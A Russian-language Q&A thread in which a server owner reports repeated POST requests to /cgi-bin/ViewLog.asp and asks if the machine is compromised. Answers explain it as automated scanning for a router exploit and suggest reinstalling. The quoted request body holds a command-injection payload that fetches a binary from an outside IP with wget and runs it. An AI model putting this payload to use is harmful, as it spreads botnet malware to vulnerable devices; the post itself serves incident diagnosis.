Вопрос или проблема
У меня есть сервер DigitalOcean, который я использую для различных временных серверов. В последнее время я заметил, что иногда я получаю постоянный спам следующих запросов:
POST http://127.0.0.1/cgi-bin/ViewLog.asp
Заголовки:
Host: 127.0.0.1
Connection: keep-alive
Accept-Encoding": gzip, deflate
Accept: */*
User-Agent: B4ckdoor-owned-you
Content-Length: 176
Content-Type: application/x-www-form-urlencoded
Тело:
{
" remote_submit_Flag": "1", // Пробел не является опечаткой
"remote_syslog_Flag": "1",
"RemoteSyslogSupported": "1",
"LogFlag": "0",
"remote_host": ";cd /tmp;wget http://152.44.44.68/d/xd.arm7;chmod 777 xd.arm7;./xd.arm7;rm -rf xd.arm"
}
Это меня не беспокоит, так как я запускаю только серверы Node.js. Что меня беспокоит, так это повторение атаки и заголовок Host (х although я полагаю, что его можно сфальсифицировать).
Раньше я запускал DNS-сервер, который по умолчанию использовал Google DNS, и оставил его без присмотра на некоторое время, и он собрал 1,5 ТБ трафика за один месяц. named -v показывает версию 9.11.3-1ubuntu1.12-Ubuntu.
Сервер скомпрометирован?
Вы правы в том, что заголовок host можно легко подделать, однако я предполагаю, что вы получили POST http://127.0.0.1/cgi-bin/ViewLog.asp прямо из ваших логов – и это указывает на то, что запросы действительно приходят от (или через) ваш localhost.
Некоторый код злоумышленника может попытаться воспользоваться:
https://www.exploit-db.com/exploits/43884
что нацелено на (ребрендированные) роутеры Zyxel и Billion. Эта атака вряд ли причинит вам вред, так как вы явно не запускаете свой код Node.js на роутере, однако сам факт того, что что-то неконтролируемое, похоже, исходит от (или пересылается) вашего localhost, должно быть расследовано.
Это похоже на автоматический поиск уязвимых машин в сети.
Хост “127.0.0.1” может быть подделанной частью http-запроса, который приходит с другого адреса. 127.0.0.1 (localhost) подвергается меньшему количеству проверок безопасности во многих сетевых системах.
Это довольно необычно, но не абсолютно бессмысленно для кого-то, кто уже может выполнять код на вашей машине, чтобы сканировать на наличие уязвимостей изнутри – он уже внутри.
Вы также можете просмотреть журналы доступа HTTP и увидеть, как этот запрос ведется.
Что касается DNS: если вы не знаете, что делаете, не запускайте публичный DNS.
p.s. никто не может сказать, скомпрометирована ли ваша машина, но так как она используется временно, лучше ее переустановить.
Ответ или решение
Постоянный спам POST-запросов к /cgi-bin/ViewLog.asp: анализ и рекомендации
Введение
Ваша ситуация с постоянным спамом POST-запросов к http://127.0.0.1/cgi-bin/ViewLog.asp вызывает серьезные опасения с точки зрения безопасности. Давайте рассмотрим это более детально, чтобы понять природу проблемы и предложить решения.
Признаки и описание проблемы
Вы столкнулись с запросами, которые содержат содержание, указывающее на потенциальную попытку эксплуатации уязвимости. Вот ключевые моменты:
- Адрес запроса: Запросы отправляются на локальный адрес (
127.0.0.1), что делает ситуацию подозрительной. - Специфика заголовка: Заголовок
Host: 127.0.0.1может быть подделан, но наличие дальнейших особенностей в запросе указывает на угрожающее намерение. - Содержимое запроса: В теле запроса находится команда, которая может попытаться загрузить и исполнять вредоносное ПО с удаленного сервера.
Возможные причины атаки
- Компрометированность системы: Запрос может указывать на то, что ваша система была взломана и используется для сканирования на предмет уязвимых сервисов.
- Автоматизированные атаки: Это может быть частью автоматизированного сканирования Интернета на наличие уязвимых устройств или сервисов. Атакующие, находясь в системе, могут использовать localhost для обхода брандмауэров и других защитных мер.
- Незащищенный DNS-сервер: Если вы оставили свой DNS-сервер без должного контроля, это могло привести к его эксплуатации для рассылки нежелательных запросов.
Рекомендации по безопасности
-
Проверка наличия компрометации:
- Просмотрите логи доступа к HTTP, чтобы отследить IP-адреса, откуда направляются запросы, и другие аномалии.
- Проверьте системные процессы и сторонние программы на наличие подозрительной активности.
-
Обновление и переустановка:
- В случае подтверждения компрометации лучше всего переустановить систему. Это гарантированно устранит любые имеющиеся уязвимости и филиалы вредоносного ПО.
- Если возможно, используйте образы виртуальных машин для быстрого разворачивания и восстановления чистых инстансов.
-
Изоляция и ограничение доступа:
- Настройте брандмауэр так, чтобы ограничить доступ к вашим сервисам только с определенных IP-адресов или через VPN.
- Используйте инструменты мониторинга, которые помогут вам обнаруживать необычные паттерны поведения в сети.
-
Безопасность DNS:
- Не оставляйте свои DNS-серверы открытыми для общего доступа, если они не предназначены для этого.
- Рассмотрите возможность использования сервисов DNS, предлагаемых третьими сторонами, таких как Google DNS или Cloudflare, чтобы снизить риски.
Заключение
Постоянный спам POST-запросов к вашему серверу — это не только тревожный сигнал о возможной компрометации, но и возможность улучшить вашу безопасность. Четкие шаги по проверке, обновлению и ограничению могут помочь защитить вашу систему от дальнейших атак. В конечном итоге, если вы не уверены в состоянии вашей системы, лучше всего подготовить чистый инстанс и перенести ваши услуги туда. Следите за актуальностью и безопасностью ваших ресурсов, чтобы минимизировать риски.